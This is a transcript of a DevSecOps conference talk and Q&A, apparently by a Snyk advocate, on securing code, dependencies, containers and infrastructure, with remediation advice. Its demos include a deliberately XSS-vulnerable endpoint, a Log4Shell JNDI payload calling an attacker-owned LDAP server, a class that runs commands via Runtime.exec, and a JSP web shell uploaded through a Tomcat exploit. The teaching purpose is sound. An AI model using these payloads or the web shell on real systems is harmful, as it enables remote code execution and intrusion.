Transcript
Vermeer: We need to talk about security. Let's talk DevSecOps, because we're all doing DevOps, and with DevOps, we try to tear down the wall between developers and the old-fashioned operations organization. We're not throwing things over the wall anymore. No, we're making sure that as a DevOps team, we create something and we own it, so that we can put it into production as a team, and if something goes wrong, it comes back to us. The only problem with that is that security is not yet part of that mindset. In many cases, the security team is still a separate team at the end of the pipeline. That means one security team works for a lot of engineering teams, and these engineering teams are scaling like crazy, but the security team is still one team. We think that making the security mindset part of the DevOps way of working, hence DevSecOps, is the solution: it makes sure that when you build applications, and specifically cloud native applications, you're secure from the beginning.
Background
My name is Brian Vermeer. I'm a senior developer advocate for Snyk. We do a lot of things around security, like developing security tooling. I'm a Java champion, and I do some stuff in the Java user groups, but that's not why we're here.
Code
We're trying to solve a situation. How bad is that situation? Is it actually such an issue? Let's go into cloud native applications for a second. If you think about applications, a lot of folks focus on your code, the custom code that you wrote, and for a good reason, because that is the thing that makes the difference for that application. That is the business logic. However, if you compare the custom code to the whole binary that you put into production, it's only 10% of the code. It's very important code, I get you. Say I created code like I did here: an endpoint that does something, obviously. What I did here was introduce a security issue. Say you're doing code reviews, or pair programming, and you're also checking whether you introduced potential security risks. What I do here is take a request parameter in this controller, and that request parameter, user, I output right away to the response writer. That means if I don't validate or sanitize that user input, it can be the source of a cross-site scripting problem. For instance, if this were the URL, I go to /hello, and put a script alert(1) in it, it will execute the script and just give you an alert. It can be worse, like sending sensitive information to, for instance, a remote server. That's not what you want.
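A minimal sketch of what such an endpoint could look like, assuming Spring MVC; the class name and mapping are hypothetical reconstructions of the demo code:

```java
import java.io.IOException;

import javax.servlet.http.HttpServletResponse;

import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class HelloController {

    @GetMapping("/hello")
    public void hello(@RequestParam("user") String user,
                      HttpServletResponse response) throws IOException {
        // User input is written straight to the response without validation or
        // sanitization: a reflected cross-site scripting (XSS) vulnerability.
        response.getWriter().write("Hello " + user);
    }
}
```

A URL like /hello?user=<script>alert(1)</script> would then reflect the script straight back to the browser. One possible fix, assuming the OWASP Java Encoder library is on the classpath, is to encode the untrusted value for the HTML context before it reaches the writer:

```java
// Same endpoint, with the untrusted value HTML-encoded before output.
// Assumes: import org.owasp.encoder.Encode;
@GetMapping("/hello")
public void hello(@RequestParam("user") String user,
                  HttpServletResponse response) throws IOException {
    // Encode.forHtml neutralizes <script> tags, event handlers, and the like.
    response.getWriter().write("Hello " + Encode.forHtml(user));
}
```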
Of course, cross-site scripting can be more than just an alert; we can use things like mouseovers and image sources to leverage cross-site scripting. You probably would have found this one with good code reviews. This is an easy one. But think about it: are your developers aware enough of security to catch this with just a code review? Why not introduce tooling that can scan your code right away as you're writing it, before you even put it in your repository, for instance on your local machine. Or once it's submitted, it can be scanned, just to help ensure you're not introducing new code vulnerabilities. We talked about code, but there's a lot under the surface. The code is only what we see, the code we wrote ourselves. In many places, in many ecosystems, we have dependencies; we depend on packages and frameworks from the outside world. These open source libraries and frameworks are roughly 80% to 90% of the code that goes into your binary and into production. However, we don't look at them as closely and as often as we do at our own code.
Say this is your application, this is the binary that you put into production. If you compare that to your own code, it's probably something like this. This small part is the code that you wrote. We take that code, and we do code reviews, and QA, and all sorts of things on it. What about the rest? Do you have policies on when you include a new library? Do you scan it for potential problems? If it's not used anymore, does it actually get removed from the manifest file? And when does it get updated?
Open Source Usage Has Exploded
Use of open source has exploded over the last decade or so, and for a good reason. As a company, you don't want to pay your developers to do the obvious stuff. If a library can do the heavy lifting for you, your developers can focus on what matters, and that is the 10% custom code. However, if there is a problem in an open source library that is well known and well used, we have a potential pool of victims that can be extremely large. We have seen that. Look at your manifest file, regardless of what ecosystem it is; say, for instance, we take Maven Central, so the Java ecosystem, and npm, in this case. This comes from our State of Open Source Security report. What you see is that a vulnerability is typically not in a top-level dependency that you pull into your application yourself. No, a framework depends on a library, which depends on another library with several dependencies underneath, maybe four or five layers deep. Then, even without knowing, you might include something that is vulnerable. If it's vulnerable, and you didn't know about it, you could be the victim of a security breach. That's probably not what you want.
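To make that concrete, here is a hypothetical excerpt of what a Maven dependency tree can look like; every coordinate except log4j-core is invented for illustration, with the vulnerable library sitting three layers below the single dependency you actually declared:

```
[INFO] com.example:my-app:jar:1.0.0
[INFO] \- org.example:some-framework:jar:2.3.1
[INFO]    \- org.example:framework-logging:jar:2.3.1
[INFO]       \- org.apache.logging.log4j:log4j-core:jar:2.14.1
```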
We've seen this happen recently, with Log4j, in December 2021. A lot of folks included Log4j as a dependency and used it without even knowing what version they were using. What we saw in our systems is that 57% of Snyk customers used Log4j as a transitive dependency, so they didn't include it themselves but were using it because it was part of a framework. We also saw that once the first and biggest problem was disclosed, over 17,000 Java packages were impacted because they depended on a small library like Log4j. Just a shout out to the folks of Log4j: they did an excellent job intervening right away and fixing these things on the spot. In the first 72 hours after this vulnerability was publicly disclosed, we saw over 800,000 attack attempts, most of them automated.
Demo - Log4j Vulnerability
Let's quickly go into the Log4j issue. I will demo it to you. I have an application here that I run on Java 8, build 111. If I try to log in with a wrong password, which is obviously wrong, you will see that in my log console it gets logged as a failed attempt. So I know that a failed login attempt gets logged. The problem is, with a vulnerable Log4j version, if I pass in this string, I know that the string will be evaluated. The JNDI request will be evaluated, and with JNDI, you look up an object. I do this, and I call an LDAP server. I own that LDAP server, which currently is on my localhost, /Evil. What this does is give back a reference to an object, and that object goes back to the application.
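A hedged sketch of the mechanism, assuming a vulnerable log4j-core (2.14.1 or earlier) on the classpath; the class and message are hypothetical, but the payload shape matches the demo:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginAudit {

    private static final Logger LOGGER = LogManager.getLogger(LoginAudit.class);

    public static void main(String[] args) {
        // The "password" the attacker types into the login form in the demo.
        // While formatting the message, vulnerable Log4j versions evaluate the
        // ${jndi:...} lookup and contact the attacker-controlled LDAP server.
        String userInput = "${jndi:ldap://localhost:999/Evil}"; // port/path as in the demo
        LOGGER.error("Failed login attempt for user: {}", userInput);
    }
}
```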
Let me show you what the code actually is. I have the LDAP server, and the LDAP server returns a reference to, in this case, an HTTP server that I spin up and own as well. That HTTP server returns this compiled class. In getObjectInstance, I call the runtime and execute a command: I try to open my calculator. Nothing harmful in this case, but if I can open a calculator, I could run all sorts of terminal commands. Let's try this one. Let me spin up the server. I spin up the server, and you see I have this LDAP server running at port 999, and I have an HTTP server. The LDAP server points to the HTTP server, which finally serves this class that the application had no clue about, and when it comes in, I hope it will run my calculator. Let's do this. By entering a wrong password, what you see is that my calculator starts up: the server returned an LDAP reference, the HTTP server returned a class, and I don't even own this class in my application; I don't have it anywhere. Because I can do this, and I know that the evaluation takes place, I can do a remote code execution.
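And a hedged reconstruction of the class served by the attacker's HTTP server; the name and command are hypothetical, but the shape follows what the demo describes. Remote class loading over LDAP like this works on older JVMs such as the Java 8, build 111 used in the demo:

```java
import java.util.Hashtable;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

// When the vulnerable JVM resolves the LDAP reference, it downloads this class,
// instantiates it as an ObjectFactory, and calls getObjectInstance.
public class Evil implements ObjectFactory {

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?, ?> environment) throws Exception {
        // Illustrative command only; the demo opens a calculator on macOS.
        // Any terminal command could go here: remote code execution.
        Runtime.getRuntime().exec("open -a Calculator");
        return null;
    }
}
```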
Who Should Be Responsible for Security?
The million dollar question is, who's responsible for security? A lot of people think, as developers, we are just creating. No, we're now doing DevOps, or, even better, we want to do DevSecOps. This means we need to include that security mindset as developers as well. That makes a lot of sense, because if I need to solve a problem, and I am the expert as a developer to do that, I create a solution by writing some code or pulling in some libraries to do the heavy lifting for me. We nowadays think of these solutions as scalable and maintainable, but we also need to think about them being secure from the beginning. If I have the responsibility of solving something, it should be the whole thing. Not just, yes, it works, so ship it. No: yes, it works, but is it fast enough, can I scale it, and is it secure? We should take our fair share, both in our software and in our infrastructure.
Containers
We talked about code. We talked about open source as part of your binary. Nowadays, we build cloud native applications, and these applications run in an environment, for instance, a container. Let's take a Docker container. The Dockerfiles that create these containers are now part of your Git repository, part of your code base. This is another thing to consider, because we base our images on top of other images. Look at your Dockerfile: the first line is probably FROM ubuntu, or FROM node. You base your stuff on top of another image. I did this research in 2019 on the 10 most commonly used base images from Docker Hub. We downloaded them at that point and scanned them for vulnerabilities, and all of them had vulnerabilities. That is because these vulnerabilities were not so much in, say, the Node.js image itself, but that Node.js image is in turn based upon another image, the operating system. I just downloaded the latest image, and in this case, that Node image is based upon a full-blown Debian operating system. First of all, think about it: do you need a full-blown operating system in your Docker image? Probably not. It gives you a lot of binaries that can potentially be vulnerable as well. We asked people, do you scan your Docker images for operating system vulnerabilities? A lot of people don't, because we're looking at the code and not so much at the container or what's around it. Putting something in a container doesn't make it safe by default.
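As a hedged illustration (tags and file names are hypothetical), the difference is often just the first line of the Dockerfile:

```dockerfile
# Full-blown Debian-based image: ships a complete OS worth of binaries.
FROM node:latest

# A slimmer base with a much smaller attack surface would be, for example:
# FROM node:lts-slim

WORKDIR /app
COPY . .
CMD ["node", "server.js"]
```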
Todolist MVC
What can possibly go wrong when your application lives in a container? I have a Java application over here. The Java application itself is not really important; the point is that it lives inside a container, in this case a container with Tomcat, a well-known web server. However, it is an old Tomcat version. If you look at the Dockerfile, it looks something like this. My Dockerfile is here, and what you see is that it is a multistage build. The final image that goes into production is based on Tomcat 8.5.21, which is somewhat old. The issue with this specific version is that it has a vulnerability, a problem with JSP files. It says it was possible to upload a JSP file to the server via a specially crafted request; the JSP could then be requested, and any code it contained would be executed by the server. This means that, regardless of the application, I can insert a JSP file, a Java Server Page file.
Let's go and see what exploit there is. There is one in Exploit-DB. I will actually use it to attack my own application. It is a Python script that creates that specially crafted request, in two steps. The first step tries to insert a JSP file with just one tag, which simply outputs a bunch of A's, to test whether this application is actually vulnerable to the problem. The second step inserts a second JSP file containing a form, basically a text field and a button. Every time I hit the button, the command in the text field gets executed, because the JSP calls the runtime and executes it. This basically means I have a web shell. Let's try it out. The application runs here; I don't need to touch it. The first file, poc.jsp with all the A's, doesn't exist yet. Let me go into my terminal. I packaged this exploit in a container containing Python. What I can do here is say 'check', which does the first request, and it tells me poc.jsp is there: it's vulnerable. That means if I go into my application and now look at poc.jsp, all the A's exist, so we can insert JSP files.
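A hedged reconstruction of what that second JSP, the web shell, could look like; the exact file served by the exploit script may differ:

```jsp
<%-- Hypothetical pwn.jsp: a text field and a button; the entered command is
     passed to the runtime and its output printed back, i.e., a web shell. --%>
<form method="post">
  <input name="cmd" type="text">
  <input type="submit" value="Run">
</form>
<%
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
      java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
      java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\A");
      out.print(s.hasNext() ? s.next() : "");
  }
%>
```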
Let's do the second one. The second file, pwn.jsp, doesn't exist yet. If I do this, uploading the web shell, let's see what happens. If I go to pwn.jsp, I now have a web shell that runs inside this Docker container. I can ask, whoami. If you don't specify a specific user for a Docker container, which a lot of people unfortunately don't, it runs as root by default. That means I have root access. What's in this folder? I can do something with packages, maybe. Basically, I have a web interface that is equal to a terminal. That is because you're running an application in a container with the wrong, vulnerable version of a base image. If I had scanned this, like I did before with my scanner, I would have seen problems like this. Maybe I have the scanner over here. I scanned my container, and I can see all the vulnerabilities my base image has. I can also see that there are remediation possibilities. For instance, I'm now running on 8.5.21, which I showed you, and I can update this base image to 8.5.70, which is the same Java Runtime Environment version 8 with fewer vulnerabilities. Trust me, that will also remediate this specific problem. Again, I'm not touching the application. I'm touching the container.
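The remediation then amounts to a one-line change in the final stage of the Dockerfile; a hedged sketch, where the build stage name and WAR path are hypothetical:

```dockerfile
# Before: FROM tomcat:8.5.21-jre8   (vulnerable to the JSP upload shown above)
# After: same JRE 8, patched Tomcat; the application itself is untouched.
FROM tomcat:8.5.70-jre8
COPY --from=build /app/target/todolist.war /usr/local/tomcat/webapps/ROOT.war
```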
Infrastructure as Code
Last but not least, infrastructure as code. What we mean by that is your cluster. Nowadays, it's not just one container; you have a landscape or a cluster of containers connected to each other using, for instance, Kubernetes, with maybe Terraform to manage all of this. You need to manage them in the right way. First of all, you don't want to accidentally give some nodes or some pods elevated privileges, because if something goes wrong, it might backfire on you and have a domino effect. We need to take care of that as well, because once again, this is all part of your code base nowadays. We need to take care of all these things.
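For instance, a hedged Kubernetes snippet (names and image are hypothetical) that refuses exactly the kind of elevated privileges mentioned above:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: todolist
spec:
  containers:
    - name: app
      image: registry.example.com/todolist:1.0.0
      securityContext:
        runAsNonRoot: true               # refuse to start as root
        allowPrivilegeEscalation: false  # no privilege escalation inside the pod
        privileged: false                # no host-level privileges
        readOnlyRootFilesystem: true     # uploading a web shell gets much harder
```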
What Is the Solution?
What is the solution? The solution basically has three parts. First of all, culture. We need to do this. We need to want this. We need to be aware that this is a core value in our way of working. As a developer, I'm not just building things. Yes, that's my core thing to do, I'm building things, but I need to be aware that building things is not my only responsibility. I'm sharing responsibility with my whole team. The security person has the responsibility of not getting breached; if I'm not helping him out with that, we are clashing, and that will not work. It's the same as working with a manager who just pushes you to create more features and wants that feature today. You can do that, but you probably leave some technical debt, and that's not a good thing if it piles up. The same holds for security. We need to adopt security from the beginning and be aware that this is part of our way of thinking.
Then there's process. Don't just introduce a ton of extra process, because you want people to adopt this. People have a way of working. Why not look at that way of working and see how you can integrate security into it, maybe through automation, to help them in the way they work now. That's where tooling comes in, because with the right tooling, tooling that fits your process instead of the other way around, you can help people out. For instance, give developers scanning tools on their local machines, so that while they're building their stuff and unit testing, which is quite common, they also scan their code and their open source dependencies before committing to their Git repositories. That makes sense. But it's not only about tooling; these three are equally important. We need to take care of all of them.
DevSecOps: Continuous Security, Integrated Throughout DevOps
Snyk can always help you with good tooling in every part of this cloud native application security story; we offer you a platform to do that. But it's not just about the tooling. It's about applying that tooling in every step of your software development lifecycle. While you're coding on your local machine, give your developers the ability to pick this up right away and make sure they don't introduce new issues. If your code lives in a Git repository, scan it often, because it might live there for a while. You probably have a CI-based system, so integrate scanning there to make sure that what goes to production is ok. Once you're in production, you need to take care of it as well, because most people think, ok, we're done. But security vulnerabilities get found over time. What is safe today might not be safe a week from now. If something goes wrong, you want to be pinged, you want to be notified: "You're using this library, or you're using this Docker image, and there is a new vulnerability found," so you at least have the knowledge to act accordingly. We say, why not monitor these things? Of course, we can help you with that. You need to be aware that you need to do this. You're not done when you go to production.
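As a concrete sketch, these scans can be run from a terminal or wired into CI with the Snyk CLI; commands shown with minimal flags, output omitted:

```shell
snyk code test                      # scan your own source code (the 10%)
snyk test                           # scan the open source dependencies in your manifest
snyk container test tomcat:8.5.21   # scan a container image, including its base layers
snyk iac test                       # scan Kubernetes/Terraform configuration files
snyk monitor                        # snapshot the project and alert on newly found vulns
```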
Shift Left Is Not Enough
A lot of people tell us to shift left, and what they mean by shift left is that you need to start at the beginning of that previous slide I showed you, at the local machine of the developers. But shifting left is not really a thing in a continuous process; there is simply no left. That is why I say shifting left is not enough. You need to do this in every stage of your development lifecycle, because the cycle comes around again and again. Software development doesn't have a defined beginning and a defined end, in most cases. If you do this early and often, you will find your vulnerabilities and your problems fast, or at least fast enough, so you can intervene whenever needed.
Questions and Answers
Losio: First of all, I'm coming from a developer background, a Java developer background, and you say, ok, now you're not a developer anymore, you're DevOps, now it's DevSecOps, whatever, we keep adding something else. I already have a lot on my plate as a developer; I have many responsibilities. How do I scale security in a development team?
Vermeer: That's the main question, and a difficult one. In some companies, people used DevOps to get rid of a few people, to do the same with less. That's what happened. But if you look at DevOps, it's about owning what you create. It's not throwing it over the wall anymore. Security should be part of that. Before we went to cloud services, when we had everything on our local machines, we thought very differently about scalability and maintainability. Now we need to handle a million requests per second, where maybe 10 years ago it was just 100 requests. That is implicitly part of our thinking now. That is also how we should treat security as developers. The problem you see is that there's probably one security team and 10 development teams, and a year from now there will probably be 15 or 20 development teams but still one security team. That is not scalable. What we did with DevOps was, more or less, get the operations person out of the operations team and make them part of the development team, or at least make sure somebody in the team knew enough to get going. That is the thing: to get going. You don't need to replace the security expert in the security team.
Let's say we have one person or a few people with security knowledge to a certain extent, so that within certain guardrails, the team can operate freely. If you say, ok, I found an image that has so many vulnerabilities I don't know what to do, then go to the security team. For all the easy things, the most common things, make sure that there is knowledge within the team. That means the security team needs to educate, so that at least somebody in each team is educated enough to make the obvious security decisions, because for developers, security is not always obvious. And the other way around: if you don't know, there always needs to be an open door to connect with the security team. Some people call it security championing, where there's one person in the team who carries this.
Losio: I would like to follow up on this, going back to the example you gave with Log4j. I go back to the end of 2021, to that famous weekend, Friday night, whatever it was. I can read the news. I'm a senior developer, I have some stuff in production. I'm not a security guy; I'm not the person in charge of it. I read the news and it's like, that's Log4j; maybe it's the version that is affected, or maybe I'm using a library that is using another library that is using something else that is affected. I start to receive emails from management saying, are we affected? What should I do, apart from reading the news and shutting down everything?
Vermeer: I absolutely agree with you. The first thing you should do is make sure that your application is scanned on a continuous basis. Once a problem like this is known, you automatically get notified. That's the first thing, because if you don't know, people might already be in your application. Secondly, and that's a bigger process, you need to look at your application and your whole release cycle to see if you can actually intervene. If I release three times a year, then I cannot intervene. From the architecture on, things must be small or flexible enough that once there is a problem, I can create a new version, release it right away, and roll it out to my customers. If not, we should at least be able to stop the application. Log4j was an example: if you are connected to the outside world, stop it.
Next, know what you're actually getting into. As developers, while we're developing, we say, I need this library, and it's probably a package that brings in tens or maybe hundreds of other packages underneath, especially in ecosystems like npm, where we have a lot of smaller packages. Do you actually know what's in there? If you want to know, for Java you use Maven or Gradle, and you can print out your dependency tree to see what's actually in there. If you deliver that software to a client, and the client asks, am I vulnerable, you can generate something like an SBOM, a software bill of materials, which basically says, my software is built upon these packages. It's essentially a printout of whatever is in your manifest file, your Maven file, and everything underneath, so you can see what is actually going on.
If you're using Maven, or Gradle, or npm, there are commands or plugins available to print out your whole dependency tree, what is actually in that binary you ship, and then you can see, ok, it's in there, maybe I can swap it out. Is there tooling that can scan this for you? Yes, my company, Snyk, can provide you with that tooling. For these manifest files, if you connect your GitHub repository, we scan them on a daily basis, or you can scan them on your local machine. If we find a vulnerability in a package or in its transitive packages, we can say, if you upgrade to this version, you get rid of x amount of vulnerabilities. That is helpful.
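For example (a hedged sketch; exact plugin coordinates and flags may differ per setup):

```shell
mvn dependency:tree        # Maven: print the full transitive dependency tree
gradle dependencies        # Gradle: the same idea
npm ls --all               # npm: list the entire installed tree
# One way to generate a CycloneDX SBOM for a Maven project:
mvn org.cyclonedx:cyclonedx-maven-plugin:makeAggregateBom
```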
Losio: In that sense, who do you see as responsible for that part? Is it the specific team, what you called a security champion, or is it more the main security person in the company who follows up on that?
Vermeer: In the end, it is a shared responsibility. Log4j was a Zero-Day. When it came in, everybody at that point was vulnerable, unless you updated right away to the newer version that had just been released. In many cases, if I go as a consultant to a company, you see that people have a large application that was built over years, with new features built on top of old features, and there are packages in there that are never updated. People actually have no clue what packages are used. Start with that. Basically, it's the Boy Scout rule: make sure that your desk is clean, just like your code. Then you're already a step ahead. When a Zero-Day comes in, if you have updated to, if not the latest then almost the latest version, the delta between what you have and what you need to update to is smaller. If you leave that gap open, APIs could change and things could break, and then you don't have the span of control to actually release a version right away. Updating early and often, even when nothing is vulnerable, is, in my opinion, a good solution. Yes, that means you have to have a good test strategy, and so forth.
Losio: I fully agree with that, and I share the pain of what you mentioned, whether it's an external company or even inside your own company. You might be in the scenario, like your example of a Tomcat 8.5 minor version that is not up to date, where I'm aware that we have that problem, that we have Tomcat or whatever else that is not up to date, but I have no control over it myself. It's out of my scope as a developer; I cannot fix it myself. What should the approach be? Is it always a team champion who escalates to the security team, which then helps out the other team?
Vermeer: There's no silver bullet; it depends on the context of your company. This happened in teams that I worked in before. I've worked at banks and government agencies here in the Netherlands, and we couldn't upgrade to the newer version of, say, Spring Boot. Escalate it. If you escalate, you have the data to say, we are using a vulnerable version; is that what we want? If it's a vulnerable version with a high severity that actually has exploits available, I think you have a case. Then you should bring it up to the team, and definitely to the security team, because if the security team finds out, they will probably say, ok, we need to do this. In many cases it's the other way around: the security team is bugging the developers. If I as a developer find something and I cannot update it, I would definitely go to the security team, either through the security champion in my team or directly, and make sure it gets mitigated. Security is one of your core values, just like scalability and maintainability.
Losio: What about the people who test the software? In what parts of the process are they involved? Developers should not code and test their own systems. I wonder if you have a strong position on that.
Vermeer: That developers should not test their own code? In utopia, definitely. It depends on how you work. If you fully work test-driven, then I wouldn't say it's a problem. However, it's all about how you deal with code. Let's get back to not even testing, but code reviewing. Do you review the tests, for instance? Do the tests make sense? How much time do you give your reviewer to actually review? Is that the same amount of hours you spent on creating the feature and the tests, or not? Is it feasible at every step of the way to have someone else test your stuff? It depends. If it's a small service, you might say unit testing is up to the developers, and integration testing is something we do with a test lead or something like that. That, again, depends on whether you are maintaining, as a small team, a small application, a big application, or a cluster of applications. What is in your span of control? If you're in control of the whole cluster, it's quite easy to do integration testing. If you're just in control of one item in the cluster, then you need contracts or something like that, and then we go into a whole different landscape of how you should test, which is not my expertise. You see how difficult these things are? The same goes for security, though. It's a shared responsibility for the whole team and the whole company, and we should take care of it. That's basically the main message here.
Losio: I will go back to Log4j, because there was another side of the question that I'm very interested in. Let's go back to day zero, and let's forget Log4j for a second, because that one was so big that, basically, even if you didn't have any tool or process in place, as long as you were reading the news, you would figure out there was a serious problem out there. Let's say your scanning tool, whatever tool you're using, doesn't identify the problem until that Zero-Day is disclosed, because before that it wasn't known; nothing had happened. What other approaches can I use to track and be aware of this kind of problem? Whose job should it be? As a developer, should I really care, or do I leave it to the security person? Is there a newsletter, a monitoring tool, a notification tool, strategies in general?
Vermeer: Yes. For Log4j it was obvious, because it was in the news. That is the one in a million that is so big that it becomes news. The last one we had this big was, I think, in 2017: Struts 2 and Equifax, that was a major one. In between, there are countless packages. That is why we come back to process and tooling. Depending on your process, I would implement tooling that does the scanning for you on a regular enough basis that it's comfortable for your team and company to intervene if you find something. If there is something out there and your tool doesn't find it yet, I would connect with the company that makes that tool and ask, I heard about this; how important is it? Because there can be reasons. In some cases, vulnerabilities are not that bad, just a bit hyped up. The Log4j issue I showed you was the first one, but after that there were three or four more. If you look at them closely, yes, they were vulnerabilities, don't get me wrong. But for most of them, you already had to have access to the configuration and change it in a particular way before anything became executable. If somebody can already access my configuration, I have a whole different problem, or I basically have people who don't know how to configure this stuff. The required configuration was so specific that those issues were not as big as the giant first Log4j problem. It depends.
Losio: There's the ideal world where we can do everything ideally, but it is cost prohibitive to follow up on every update of every dependency. Having something in front, whatever it is, and sanitizing your input can help.